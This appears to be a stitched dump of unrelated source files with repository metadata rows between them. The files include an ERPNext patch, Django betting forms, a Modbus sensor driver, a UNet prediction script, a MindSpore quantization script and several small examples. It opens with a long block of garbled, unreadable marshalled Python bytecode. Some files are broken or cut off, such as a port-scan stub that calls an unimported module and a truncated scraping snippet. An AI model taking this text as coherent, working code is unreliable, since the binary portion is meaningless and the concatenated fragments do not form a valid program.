\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x10\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00R2\x00\x00\x00R\x0b\x00\x00\x00Re\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00Rz\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x00\x00\x00\x00Rh\x00\x00\x00(\x0c\x00\x00\x00Ri\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R7\x00\x00\x00Rm\x00\x00\x00R+\x00\x00\x00Ra\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rz\x00\x00\x00\x94\x02\x00\x00s\xc6\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01\x1b\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01!\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01\x07\x01\x15\x01\r\x01\x05\x01\x05\x01\t\x01\x05\x01\x12~\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01)\x01\x05\x01\t\x01\x05\x01\n\x01t\x08\x00\x00\x00__main__(1\x00\x00\x00R\x06\x00\x00\x00t\x03\x00\x00\x00sysR"\x00\x00\x00t\x08\x00\x00\x00datetimet\x02\x00\x00\x00ret\x06\x00\x00\x00randomt\x07\x00\x00\x00hashlibt\t\x00\x00\x00threadingR\x1e\x00\x00\x00t\x07\x00\x00\x00getpasst\x06\x00\x00\x00urllibt\t\x00\x00\x00cookielibR\x1c\x00\x00\x00t\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR\x07\x00\x00\x00t\x04\x00\x00\x00patht\x06\x00\x00\x00isfilet\x13\x00\x00\x00requests.exceptionsR\x02\x00\x00\x00R#\x00\x00\x00t\x07\x00\x00\x00randintt\x02\x00\x00\x00bdt\x03\x00\x00\x00simt\x04\x00\x00\x00reprR2\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingR\x12\x00\x00\x00R\x13\x00\x00\x00t\x02\x00\x00\x00c3R\x08\x00\x00\x00R\x0b\x00\x00\x00R\n\x00\x00\x00R\x15\x00\x00\x00R\x14\x00\x00\x00R&\x00\x00\x00R\x0f\x00\x00\x00R=\x00\x00\x00Rc\x00\x00\x00Re\x00\x00\x00Rd\x00\x00\x00Ro\x00\x00\x00Ru\x00\x00\x00Rv\x00\x00\x00R\x10\x00\x00\x00Rz\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x08\x00\x00\x00<module>\x04\x00\x00\x00sn\x00\x00\x00\x03\x01\x9c\x01\x14\x01\r\x01\r\x01\x11\x01\r\x0b\x12\x01\x10\x01\x12\x01\x10\x01\x10\x01\r\x01\x12\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\r\x01\x10\x01\x12\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\r\x01\x10\x01\x12\x01\x12\x01P\x01\n\x01\r\x01\x06\x01\x06\x01\x06\x02\t\x02\t\n\t\x0b\t\n\t"\t"\t,\t\xea\t\x0b\t\t\t\x12\t_\t+\t\x08\t,\t\xe2\x0c\x01'))
| 16,569.75 | 66,237 | 0.748276 |
039e52111c90723aebbd1f70afb6aac22ebd8187
| 1,087 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v4_0/create_price_list_if_missing.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v4_0/create_price_list_if_missing.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v4_0/create_price_list_if_missing.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils.nestedset import get_root_of
def execute():
# setup not complete
if not frappe.db.sql("""select name from tabCompany limit 1"""):
return
if "shopping_cart" in frappe.get_installed_apps():
frappe.reload_doc("shopping_cart", "doctype", "shopping_cart_settings")
if not frappe.db.sql("select name from `tabPrice List` where buying=1"):
create_price_list(_("Standard Buying"), buying=1)
if not frappe.db.sql("select name from `tabPrice List` where selling=1"):
create_price_list(_("Standard Selling"), selling=1)
def create_price_list(pl_name, buying=0, selling=0):
price_list = frappe.get_doc({
"doctype": "Price List",
"price_list_name": pl_name,
"enabled": 1,
"buying": buying,
"selling": selling,
"currency": frappe.db.get_default("currency"),
"territories": [{
"territory": get_root_of("Territory")
}]
})
price_list.insert()
| 30.194444 | 74 | 0.734131 |
2066c8d39c1df13a482f93785ddd8ecab22faca8
| 1,207 |
py
|
Python
|
src/test_unet.py
|
tuanminh3395/gr-bone-age
|
248c929d75e9d88dc9fa102ea11f4eae1e0f3157
|
[
"MIT"
] | null | null | null |
src/test_unet.py
|
tuanminh3395/gr-bone-age
|
248c929d75e9d88dc9fa102ea11f4eae1e0f3157
|
[
"MIT"
] | null | null | null |
src/test_unet.py
|
tuanminh3395/gr-bone-age
|
248c929d75e9d88dc9fa102ea11f4eae1e0f3157
|
[
"MIT"
] | null | null | null |
import numpy as np
from keras.models import Model
from data_unet import load_test_data, desired_size
from train_unet import preprocess, batch_size
import os
from skimage.io import imsave
from constants import mask_raw_path, get_unet
print('-'*30)
print('Loading and preprocessing test data...')
print('-'*30)
imgs_test, imgs_id_test = load_test_data()
imgs_test = preprocess(imgs_test)
# mean = np.mean(imgs_test) # mean for data centering
# std = np.std(imgs_test) # std for data normalization
# imgs_test -= mean
# imgs_test /= std
print('-'*30)
print('Loading saved weights...')
print('-'*30)
model = get_unet()
model.load_weights('unet.h5')
print('-'*30)
print('Predicting masks on test data...')
print('-'*30)
imgs_mask_test = model.predict(imgs_test, verbose=1, batch_size=batch_size)
np.save('imgs_mask_test.npy', imgs_mask_test)
print('-' * 30)
print('Saving predicted masks to files...')
print('-' * 30)
if not os.path.exists(mask_raw_path):
os.mkdir(mask_raw_path)
mask_size = (desired_size, desired_size)
for image, image_id in zip(imgs_mask_test, imgs_id_test):
image = (image[:, :, 0])
print(image_id)
imsave(os.path.join(mask_raw_path, str(image_id) + '.png'), image)
| 27.431818 | 75 | 0.730737 |
6406694116160953f2f9538a3a833a116f31c961
| 8,500 |
py
|
Python
|
bets/forms.py
|
Thames1990/BadBatBets
|
8dffb69561668b8991bf4103919e4b254d4ca56a
|
[
"MIT"
] | null | null | null |
bets/forms.py
|
Thames1990/BadBatBets
|
8dffb69561668b8991bf4103919e4b254d4ca56a
|
[
"MIT"
] | null | null | null |
bets/forms.py
|
Thames1990/BadBatBets
|
8dffb69561668b8991bf4103919e4b254d4ca56a
|
[
"MIT"
] | null | null | null |
from django import forms
from django.core.exceptions import ValidationError
from django.utils import timezone
from .models import ChoiceBet, DateBet
from .util import create_choices
from ledger.models import Account
from profiles.models import ForbiddenUser
class ChoiceBetCreationForm(forms.ModelForm):
class Meta:
model = ChoiceBet
fields = ['name', 'description', 'end_bets_date', 'end_date']
pub_date = forms.DateField(widget=forms.SelectDateWidget, required=False)
end_bets_date = forms.DateField(widget=forms.SelectDateWidget, required=False)
end_date = forms.DateField(widget=forms.SelectDateWidget, required=False)
forbidden = forms.ModelMultipleChoiceField(queryset=ForbiddenUser.objects.all(), required=False)
def __init__(self, *args, **kwargs):
super(ChoiceBetCreationForm, self).__init__(*args, **kwargs)
self.fields['forbidden'].widget.attrs["size"] = ForbiddenUser.objects.all().count()
def clean_pub_date(self):
pub_date = self.cleaned_data.get('pub_date')
if pub_date is None:
return pub_date
if pub_date <= timezone.now().date():
raise ValidationError(
'If you set a publication date, it has to be in the future. If you want the bet to be visible '
'immediately, do not set a publication date.',
code='pub_date_not_in_future')
return pub_date
def clean_end_bets_date(self):
pub_date = self.cleaned_data.get('pub_date')
end_bets_date = self.cleaned_data.get('end_bets_date')
if end_bets_date is None:
return end_bets_date
if pub_date is None:
if end_bets_date <= timezone.now().date():
raise ValidationError('Must give at least 1 day to place bets.', code='end_bets_not_in_future')
elif end_bets_date <= pub_date:
raise ValidationError('Bet placement has to be open after publish date.',
code='end_bets_date_before_pub_date')
return end_bets_date
def clean_end_date(self):
pub_date = self.cleaned_data.get('pub_date')
end_bets_date = self.cleaned_data.get('end_bets_date')
end_date = self.cleaned_data.get('end_date')
if end_date is None:
return end_date
if end_date < end_bets_date:
raise ValidationError('Placement of bets cannot be sustained after the bet is closed',
code='end_date_before_end_bets_date')
if end_date <= pub_date:
raise ValidationError('The timespan between the publishement date and end date must be at least one day.',
code='bet_timespan_too_short')
return end_date
def save(self, request):
name = self.cleaned_data['name']
description = self.cleaned_data['description']
pub_date = self.cleaned_data['pub_date']
end_bets_date = self.cleaned_data['end_bets_date']
end_date = self.cleaned_data.get('end_date')
forbidden = self.cleaned_data['forbidden']
account = Account(name=name, type='b')
account.save()
new_bet = ChoiceBet(
owner=request.user.profile,
name=name,
description=description,
end_bets_date=end_bets_date,
end_date=end_date,
account=account
)
try:
choices = create_choices(request, new_bet)
except ValidationError:
raise
new_bet.save()
for choice in choices:
choice.save()
for forbidden_user in forbidden:
new_bet.forbidden.add(forbidden_user)
if pub_date is not None:
new_bet.pub_date = pub_date
new_bet.save()
return new_bet
class DateBetCreationForm(forms.ModelForm):
class Meta:
model = DateBet
fields = ['name', 'description', 'end_bets_date', 'time_period_start', 'time_period_end']
pub_date = forms.DateField(widget=forms.SelectDateWidget, required=False)
end_bets_date = forms.DateField(widget=forms.SelectDateWidget, required=False)
time_period_start = forms.DateField(widget=forms.SelectDateWidget, required=False)
time_period_end = forms.DateField(widget=forms.SelectDateWidget, required=False)
forbidden = forms.ModelMultipleChoiceField(queryset=ForbiddenUser.objects.all(), required=False)
def clean_pub_date(self):
pub_date = self.cleaned_data.get('pub_date')
if pub_date is None:
return pub_date
if pub_date <= timezone.now().date():
raise ValidationError(
'If you set a publication date, it has to be in the future. If you want the bet to be visible '
'immediately, do not set a publication date.',
code='pub_date_not_in_future')
return pub_date
def clean_end_bets_date(self):
pub_date = self.cleaned_data.get('pub_date')
end_bets_date = self.cleaned_data.get('end_bets_date')
if end_bets_date is None:
return end_bets_date
if pub_date is None:
if end_bets_date <= timezone.now().date():
raise ValidationError('Must give at least 1 day to place bets.', code='end_bets_not_in_future')
elif end_bets_date < pub_date:
raise ValidationError('Bet placement has to be open after publish date.',
code='end_bets_date_before_pub_date')
return end_bets_date
def clean_time_period_start(self):
pub_date = self.cleaned_data.get('pub_date')
time_period_start = self.cleaned_data.get('time_period_start')
if time_period_start is None:
return time_period_start
if pub_date is None:
if time_period_start <= timezone.now().date():
raise ValidationError(
'The period to bet on must be in the future.', code='time_period_start_not_in_future')
elif time_period_start <= pub_date:
raise ValidationError(
'The period to bet on has to start after Publication. Do not set a start date if you want the '
'period to start at publication.',
code='time_period_start_not_greater_pub')
return time_period_start
def clean_time_period_end(self):
pub_date = self.cleaned_data.get('pub_date')
time_period_start = self.cleaned_data.get('time_period_start')
time_period_end = self.cleaned_data.get('time_period_end')
if time_period_end is None:
return time_period_end
if (pub_date is None) and (time_period_start is None):
if time_period_end <= timezone.now().date():
raise ValidationError('The period to bet on must not end in the past', code='period_end_not_in_future')
elif not (time_period_start is None):
if time_period_start >= time_period_end:
raise ValidationError('The period to bet on must end after it has started',
code='period_end_not_greater_period_start')
elif not (pub_date is None):
if time_period_end <= pub_date:
raise ValidationError('The period to bet on must not end before the bet is visible',
code='period_end_not_greater_pub')
return time_period_end
def save(self, user):
name = self.cleaned_data['name']
description = self.cleaned_data['description']
pub_date = self.cleaned_data['pub_date']
end_bets_date = self.cleaned_data['end_bets_date']
time_period_start = self.cleaned_data['time_period_start']
time_period_end = self.cleaned_data['time_period_end']
forbidden = self.cleaned_data['forbidden']
account = Account(name=name, type='b')
account.save()
new_bet = DateBet.objects.create(
owner=user,
name=name,
description=description,
end_bets_date=end_bets_date,
time_period_start=time_period_start,
time_period_end=time_period_end,
account=account
)
for forbidden_user in forbidden:
new_bet.forbidden.add(forbidden_user)
if pub_date is not None:
new_bet.pub_date = pub_date
new_bet.save()
return new_bet
| 37.946429 | 119 | 0.640353 |
ff5b26b516499285945eef1f432205d908264405
| 1,739 |
py
|
Python
|
haas_lib_bundles/python/docs/examples/solar_street_lamp/haas506/code/yuanda_htb485.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
haas_lib_bundles/python/docs/examples/solar_street_lamp/haas506/code/yuanda_htb485.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
haas_lib_bundles/python/docs/examples/solar_street_lamp/haas506/code/yuanda_htb485.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
import ustruct
class HTB485(object):
def __init__(self, mbObj, devAddr):
self.mbObj = mbObj
self.devAddr = devAddr
def getHumidity(self):
if self.mbObj is None:
raise ValueError("invalid modbus object.")
value = bytearray(4)
ret = self.mbObj.readHoldingRegisters(self.devAddr, 0, 2, value, 200)
if ret[0] < 0:
raise ValueError("readHoldingRegisters failed. errno:", ret[0])
humidity = ustruct.unpack('hh',value)
return humidity[0]
def getTemperature(self):
if self.mbObj is None:
raise ValueError("invalid modbus object.")
value = bytearray(4)
ret = self.mbObj.readHoldingRegisters(self.devAddr, 0, 2, value, 200)
if ret[0] < 0:
raise ValueError("readHoldingRegisters failed. errno:", ret[0])
temperature = ustruct.unpack('hh',value)
return temperature[1]
def getBrightness(self):
if self.mbObj is None:
raise ValueError("invalid modbus object.")
value = bytearray(4)
ret = self.mbObj.readHoldingRegisters(self.devAddr, 2, 2, value, 200)
if ret[0] < 0:
raise ValueError("readHoldingRegisters failed. errno:", ret[0])
brightness = ustruct.unpack('hh',value)
return brightness[1]
def getHTB(self):
if self.mbObj is None:
raise ValueError("invalid modbus object.")
value = bytearray(10)
ret = self.mbObj.readHoldingRegisters(self.devAddr, 0, 5, value, 200)
if ret[0] < 0:
raise ValueError("readHoldingRegisters failed. errno:", ret[0])
htb = ustruct.unpack('hhhhh',value)
return htb
| 35.489796 | 77 | 0.598045 |
92311f2e2b58ac2083d59f134f408c5e06c2e09a
| 265 |
py
|
Python
|
showcase11/com/aaron/scan_port_example.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | null | null | null |
showcase11/com/aaron/scan_port_example.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | 2 |
2021-03-25T22:00:07.000Z
|
2022-01-20T15:51:48.000Z
|
showcase11/com/aaron/scan_port_example.py
|
qsunny/python
|
ace8c3178a9a9619de2b60ca242c2079dd2f825e
|
[
"MIT"
] | null | null | null |
# -*- codiing:utf-8 -*-
"""
scan port example
pip install port-scanner
"""
__author__="aaron.qiu"
import os
if __name__=='__main__':
my_target = portscanner.Target("example.com")
my_target.scan(min=1, max=100, timeout=0.01)
my_target.report(all=True)
| 18.928571 | 49 | 0.686792 |
92942f910127b90360068e98568ff32c14d65a26
| 863 |
py
|
Python
|
exercises/en/test_02_06.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | 2 |
2020-07-07T01:46:37.000Z
|
2021-04-20T03:19:43.000Z
|
exercises/en/test_02_06.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/en/test_02_06.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
def test():
assert (
"import Doc, Span" in __solution__ or "import Span, Doc" in __solution__
), "Did you import the Doc and Span correctly?"
assert doc.text == "I like David Bowie", "Did you create the Doc correctly?"
assert span.text == "David Bowie", "Did you create the span correctly?"
assert span.label_ == "PERSON", "Did you add the label PERSON to the span?"
assert "doc.ents =" in __solution__, "Did you overwrite the doc.ents?"
assert len(doc.ents) == 1, "Did you add the span to the doc.ents?"
assert (
list(doc.ents)[0].text == "David Bowie"
), "Did you add the span to the doc.ents?"
__msg__.good(
"Perfect! Creating spaCy's objects manually and modifying the "
"entities will come in handy later when you're writing your own "
"information extraction pipelines."
)
| 47.944444 | 80 | 0.653534 |
a60e18ef434f690ad4ed8f93952168aa16c0810b
| 1,028 |
py
|
Python
|
haas_lib_bundles/python/docs/examples/smart_fan/esp32/code/fan.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
haas_lib_bundles/python/docs/examples/smart_fan/esp32/code/fan.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
haas_lib_bundles/python/docs/examples/smart_fan/esp32/code/fan.py
|
wstong999/AliOS-Things
|
6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9
|
[
"Apache-2.0"
] | null | null | null |
from driver import PWM
class Fan(object):
def __init__(self, pwmObj,data=None):
self.pwmObj = None
if not isinstance(pwmObj, PWM):
raise ValueError("parameter is not an PWM object")
self.pwmObj = pwmObj
if data is not None:
self.data = data
self.setOptionDuty()
else:
self.data = {'freq':2000, 'duty': 0 }
def setOptionDuty(self):
if self.pwmObj is None:
raise ValueError("invalid PWM object")
self.pwmObj.setOption(self.data)
def control(self,gear):
if not isinstance(gear,int):
raise ValueError("gear is not an int object")
if not gear in range(4):
raise ValueError("gear must be in range 0-3")
if gear == 0:
self.data['duty'] = 0
if gear == 1:
self.data['duty'] = 33
if gear == 2:
self.data['duty'] = 66
if gear == 3:
self.data['duty'] = 99
self.setOptionDuty()
| 27.052632 | 62 | 0.532101 |
a6515768876861b3dca850a779c2dc12e5cddce9
| 861 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v6_20x/remove_customer_supplier_roles.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v6_20x/remove_customer_supplier_roles.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v6_20x/remove_customer_supplier_roles.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
from __future__ import unicode_literals
import frappe
def execute():
frappe.reload_doc("buying", "doctype", "request_for_quotation_supplier")
frappe.reload_doc("buying", "doctype", "request_for_quotation_item")
frappe.reload_doc("buying", "doctype", "request_for_quotation")
frappe.reload_doc("projects", "doctype", "timesheet")
for role in ('Customer', 'Supplier'):
frappe.db.sql('''delete from `tabHas Role`
where role=%s and parent in ("Administrator", "Guest")''', role)
if not frappe.db.sql('select name from `tabHas Role` where role=%s', role):
# delete DocPerm
for doctype in frappe.db.sql('select parent from tabDocPerm where role=%s', role):
d = frappe.get_doc("DocType", doctype[0])
d.permissions = [p for p in d.permissions if p.role != role]
d.save()
# delete Role
frappe.delete_doc_if_exists('Role', role)
| 35.875 | 85 | 0.70964 |
1bd3dbdc1cc7eaf5089a486ae1be33c3ead7d270
| 717 |
py
|
Python
|
python/en/_pandas/my_example/pd_read_csv_df_to_numpy.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_pandas/my_example/pd_read_csv_df_to_numpy.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_pandas/my_example/pd_read_csv_df_to_numpy.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
'''
Read a dataframe into a numpy array.
'''
import os
import numpy as np
import pandas as pd
if __name__ == '__main__':
dir_input = 'input'
filename = 'example.csv'
file = os.path.join( dir_input, filename )
df = pd.read_csv( file, header=0 )
data_np = df.to_numpy()
# array([[22338, 11479, 26706, ..., 6647, 0, 0],
# [ 7144, 8366, 12232, ..., 26923, 25935, 27134],
# [25235, 26195, 11457, ..., 0, 0, 0],
# ...,
# [30140, 12388, 8489, ..., 0, 0, 0],
# [14151, 9603, 5506, ..., 0, 0, 0],
# [10946, 1203, 20637, ..., 0, 0, 0]], dtype=int64)
| 29.875 | 74 | 0.447699 |
847223b8683037e6c728e510a594e0c5d05adb56
| 652 |
py
|
Python
|
tools/legacy/pac-man/plugins/postinstall/rename.py
|
gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 2 |
2020-03-18T18:23:27.000Z
|
2020-08-02T15:59:16.000Z
|
tools/legacy/pac-man/plugins/postinstall/rename.py
|
gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 5 |
2019-07-07T16:47:47.000Z
|
2020-08-10T16:20:00.000Z
|
tools/legacy/pac-man/plugins/postinstall/rename.py
|
gifted-nguvu/darkstar-dts-converter
|
aa17a751a9f3361ca9bbb400ee4c9516908d1297
|
[
"MIT"
] | 1 |
2022-02-16T14:59:12.000Z
|
2022-02-16T14:59:12.000Z
|
import os
import json
def canExecute(postInstallValue):
if postInstallValue == "postinstall.rename.json":
return True
return False
def execute(postInstallScriptPath, destDir):
with open(postInstallScriptPath, "r") as scriptFile:
config = json.loads(scriptFile.read())
for originalName, newName in config.items():
if os.path.exists(os.path.join(destDir, originalName)):
print(f"renaming {originalName} to {newName}")
os.replace(os.path.join(destDir, originalName), os.path.join(destDir, newName))
else:
print("cannot find " + originalName)
| 31.047619 | 95 | 0.647239 |
ca00080a41a5070ee582e1ebaa9aa121277f0813
| 4,532 |
py
|
Python
|
official/cv/yolov3_resnet18/ascend310_quant_infer/post_quant.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/yolov3_resnet18/ascend310_quant_infer/post_quant.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/yolov3_resnet18/ascend310_quant_infer/post_quant.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""do post training quantization for Ascend310"""
import os
import sys
import numpy as np
from amct_mindspore.quantize_tool import create_quant_config
from amct_mindspore.quantize_tool import quantize_model
from amct_mindspore.quantize_tool import save_model
import mindspore as ms
import mindspore.ops as ops
from mindspore import context, Tensor
from mindspore.train.serialization import load_checkpoint, load_param_into_net
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
def quant_yolov3_resnet(network, dataset, input_data):
"""
Export post training quantization model of AIR format.
Args:
network: the origin network for inference.
dataset: the data for inference.
input_data: the data used for constructing network. The shape and format of input data should be the same as
actual data for inference.
"""
# step2: create the quant config json file
create_quant_config("./config.json", network, *input_data)
# step3: do some network modification and return the modified network
calibration_network = quantize_model("./config.json", network, *input_data)
calibration_network.set_train(False)
# step4: perform the evaluation of network to do activation calibration
concat = ops.Concat()
index = 0
image_data = []
for data in dataset.create_dict_iterator(num_epochs=1):
index += 1
if index == 1:
image_data = data["image"]
else:
image_data = concat((image_data, data["image"]))
if index == dataset.get_dataset_size():
_ = calibration_network(image_data, data["image_shape"])
# step5: export the air file
save_model("results/yolov3_resnet_quant", calibration_network, *input_data)
print("[INFO] the quantized AIR file has been stored at: \n {}".format("results/yolov3_resnet_quant.air"))
def export_yolov3_resnet():
""" prepare for quantization of yolov3_resnet """
cfg = ConfigYOLOV3ResNet18()
net = yolov3_resnet18(cfg)
eval_net = YoloWithEval(net, cfg)
param_dict = load_checkpoint(default_config.ckpt_file)
load_param_into_net(eval_net, param_dict)
eval_net.set_train(False)
default_config.export_batch_size = 1
shape = [default_config.export_batch_size, 3] + cfg.img_shape
input_data = Tensor(np.zeros(shape), ms.float32)
input_shape = Tensor(np.zeros([1, 2]), ms.float32)
inputs = (input_data, input_shape)
if not os.path.isdir(default_config.eval_mindrecord_dir):
os.makedirs(default_config.eval_mindrecord_dir)
yolo_prefix = "yolo.mindrecord"
mindrecord_file = os.path.join(default_config.eval_mindrecord_dir, yolo_prefix + "0")
if not os.path.exists(mindrecord_file):
if os.path.isdir(default_config.image_dir) and os.path.exists(default_config.anno_path):
print("Create Mindrecord")
data_to_mindrecord_byte_image(default_config.image_dir,
default_config.anno_path,
default_config.eval_mindrecord_dir,
prefix=yolo_prefix,
file_num=8)
print("Create Mindrecord Done, at {}".format(default_config.eval_mindrecord_dir))
else:
print("image_dir or anno_path not exits")
datasets = create_yolo_dataset(mindrecord_file, is_training=False)
ds = datasets.take(16)
quant_yolov3_resnet(eval_net, ds, inputs)
if __name__ == "__main__":
sys.path.append("..")
from src.yolov3 import yolov3_resnet18, YoloWithEval
from src.config import ConfigYOLOV3ResNet18
from src.dataset import create_yolo_dataset, data_to_mindrecord_byte_image
from model_utils.config import config as default_config
export_yolov3_resnet()
| 40.464286 | 116 | 0.69594 |
b69cdb79a058f81d31bcaf29627ccc737fe4a071
| 350 |
py
|
Python
|
Prediction/collision.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | 2 |
2018-04-12T14:24:33.000Z
|
2020-09-16T07:03:28.000Z
|
Prediction/collision.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | null | null | null |
Prediction/collision.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | null | null | null |
from vec2 import Vec2
import time
# Needs constant time step
def find_collision(o1, o2, threshold):
current_time = int(round(time.time() * 1000))
for pos1, pos2 in zip(o1, o2):
if pos1[1] < current_time and pos2[1] < current_time:
continue
if Vec2.distance(pos1[0], pos2[0]) < threshold:
return pos1
| 26.923077 | 61 | 0.631429 |
b6a58014cb2c1dd285a64c4c67e47d0323b569b8
| 250 |
py
|
Python
|
python/coursera_python/MICHIGAN/WEB/week4/shr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/coursera_python/MICHIGAN/WEB/week4/shr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/coursera_python/MICHIGAN/WEB/week4/shr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import urllib2
from bs4 import BeautifulSoup
page = urllib2.urlopen(raw_input("Enter URL: "))
soup = BeautifulSoup(page, "html.parser")
spans = soup('span')
numbers = []
for span in spans:
numbers.append(int(span.string))
